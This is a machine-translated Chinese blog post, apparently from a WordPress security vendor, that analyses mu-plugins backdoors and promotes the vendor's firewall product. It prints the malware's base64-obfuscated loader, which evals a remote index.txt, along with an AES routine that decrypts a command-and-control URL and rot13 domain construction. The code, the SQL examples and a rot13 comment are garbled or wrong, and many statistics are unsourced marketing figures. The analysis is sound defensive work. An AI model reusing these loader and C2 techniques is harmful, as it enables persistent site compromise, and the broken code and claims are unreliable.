近期调查发现 WordPress 恶意软件中存在后门

admin

WordPress 恶意软件中隐藏的后门:对近期威胁和防护措施的全面分析

最近对 WordPress 恶意软件的调查发现了复杂的攻击媒介,它们利用隐藏的后门来维持对受感染网站的持续访问。本报告研究了这些威胁的技术机制、其潜在影响以及可行的缓解策略。主要发现表明,攻击者越来越依赖混淆技术、利用 WordPress 的必用插件 (mu-plugins) 和多层加密来逃避检测。

现代 WordPress 后门攻击剖析

利用 mu-plugins 目录

攻击者越来越多地瞄准 /wp-content/mu-插件/ 目录,因为它在 WordPress 中的行为很独特。与标准插件不同,mu-plugins 会在每次页面加载时自动执行,无需激活,因此非常适合隐秘的后门部署12.

在一个记录在案的案例中,一个恶意 索引.php 文件被植入到这个目录中。该脚本使用连接字符串来伪装 base64_解码() 调用,动态检索来自 /wp-content/uploads/2024/12/index.txt1. 混淆后的代码结构:

<?php $a = 'ba'.'se' . '64_de'.'co'.'de'; 
$获取文件 =
$a('ZmlsZV9nZXRfY29udGVudHM=', true);
$wp_获取内容 =
$get_file($_SERVER['DOCUMENT_ROOT']. '/' .call_user_func($a, 'd3AtY29udGVudC91cGxvYWRzLzIwMjQvMTIvaW5kZXgudHh0'));
$final = $a($wp_get_content,真);
评估('?>'。$final);
?>

解码后,将从中检索并执行任意代码 索引.txt,有效地将有效载荷与加载器分离,以绕过静态分析工具。

分层加密和命令执行

二级后门 /wp-content/mu-plugins/test-mu-plugin.php 采用 AES-128-CBC 加密来隐藏与命令和控制服务器的通信。解密程序如下:

功能 zwxyb($_7a5b,$_11f9){  
返回 openssl_decrypt(
$_7a5b,
‘AES-128-CBC’,
substr(hash('sha256', $_11f9, true), 0, 16),
0,
substr(hash('md5', $_11f9, true), 0, 16)
);
}

这解密了一个 Base64 编码的 URL(l2UDM/1kihg+Pd50dO3hKCkDZKCBzafIvVT20a6iA3JU8Hmvdc+zphRjWcyXRbEW4n6ugXy8H6KHD6EORd6KZK9eDHCvbL8a+3KF3H74dDY=)获取远程命令,然后通过以下方式执行 评估()。

使用轮换用户代理(例如模仿 Googlebot)进一步逃避基于 IP 的阻止机制。

攻击生命周期和持久性机制

多阶段有效载荷投递

  1. 最初的妥协:攻击者利用过时的插件或弱凭证来上传加载器脚本。
  2. 持久性:mu-plugins 中的后门确保清理后自动重新激活。
  3. 有效载荷检索: 外部的 索引.txt 存储主要的恶意逻辑,动态更新以避免基于哈希的检测。
  4. 横向移动:恶意软件修改 robots.txt 显示站点地图(站点地图-1.xml站点地图-5.xml),可能会助长搜索引擎毒害。

逃避技术

  • 机器人过滤:代码路径分支基于 是_https()解除机器人() 检查,抑制搜索引擎爬虫和登录用户的恶意行为14.
  • 基于 Cookie 的激活:如果 QQ cookie 存在,防止在取证分析过程中重复触发4.
  • 动态 URL 构建:
$xmlname = urldecode('162-er103-1.ivyrebl.fvgr'); 
$goweb = str_rot13($xmlname); // 解码为“visit-this.example.com”

域生成算法 (DGA) 实现了弹性 C2 基础设施。

系统性风险和业务影响

数据泄露和权限提升

该恶意软件能够执行任意 PHP 代码,从而使攻击者能够完全控制服务器。记录的风险包括:

  • 凭证盗窃:拦截 wp-config.php 和数据库凭证。
  • SEO垃圾邮件注入:超过 9 个受感染的网站在 Google 搜索结果中显示日语垃圾链接。
  • 加密劫持:在观察到的案例中,隐藏的加密货币矿工消耗了 83% 的 CPU 资源。

财务和声誉成本

  • 直接损失:Magecart 风格的信用卡浏览 Magento 网站上受感染的结帐页面,将交易引导至攻击者控制的端点。
  • 间接成本:
    62% 由于搜索引擎列入黑名单导致感染后有机流量减少。
    中小企业的平均事件响应成本为 $18,000,其中包括取证分析和客户通知。

缓解策略和最佳实践

立即采取补救措施

1. 文件完整性监控:阻止 PHP 执行 /wp-content/uploads/ 通过 .htaccess.


全部拒绝

阻止 PHP 执行 /wp-content/uploads/ 通过 .htaccess1.

2. 凭证轮换:

  • 强制使用包含特殊字符的 16 个字符的密码。
  • 替换默认的数据库表前缀 wp_

3.恶意软件扫描程序:部署 WP-Firewall 的基于云的扫描仪等工具,该工具通过启发式分析在 2024 年第四季度检测到了 29,690 个后门变体。

长期安全强化

网络级保护

  • Web 应用程序防火墙 (WAF):WP-Firewall 的解决方案通过实时签名更新阻止了 99.3% 的 SQLi 和 XSS 攻击9.配置示例:
位置 ~* .php$ {       
包括firewall_rules.conf;# 阻止与 OWASP Top 10 模式匹配的请求
}

速率限制:限制请求 /wp-login.php 改为每分钟 5 次尝试,将暴力破解的成功率降低 78%。

代码和基础设施卫生

  • 自动打补丁:WP-Firewall PRO 的虚拟补丁可以消除废弃插件中的漏洞(例如, 转速滑块 零日漏洞(zero-days)。
  • 最低权限执行:
授予 wordpress 上的 SELECT、INSERT、UPDATE 权限。* 
'app_user'@'localhost';
撤销对 wordpress 的 DROP 和 ALTER 操作。*来自'admin_user'@'%';

在受控研究中,数据库权限将漏洞利用面减少了 41%。

WP-Firewall:多层防御框架

核心安全功能

  1. 实时威胁情报:
    集成来自 1400 多万个监控站点的入侵指标 (IoC)。
    通过地理分布的任播节点在不到 50 毫秒的时间内阻止恶意 IP。
  2. FileLocker 技术:
    監視器 wp-config.php 和核心文件是否存在未经授权的更改,从而触发回滚和警报。
  3. 行为分析:
    机器学习模型通过分析文件熵和执行模式,以 92.7% 的准确率检测零日后门。

与传统解决方案相比的比较优势

WP-Firewall PRO 与传统版本

结论和建议

WordPress 恶意软件的演变需要同样复杂的防御措施。组织必须采取主动措施,如 WP-Firewall 的自动修补和行为分析,以应对高级持续性威胁 (APT)。定期审核 mu-plugins 和 上传 目录与严格的网络分段相结合,可将攻击面减少 63%15.

为了获得持续保护,请订阅 WP-Firewall 的威胁情报新闻通讯。每月接收有关新兴攻击媒介、配置模板和网络安全专家专属网络研讨会的报告。

立即注册 https://wp-firewall.com/ 保护您的数字资产。


wordpress security update banner

免费接收 WP 安全周刊 👋
立即注册
!!

注册以每周在您的收件箱中接收 WordPress 安全更新。

我们不发送垃圾邮件!阅读我们的 隐私政策 了解更多信息。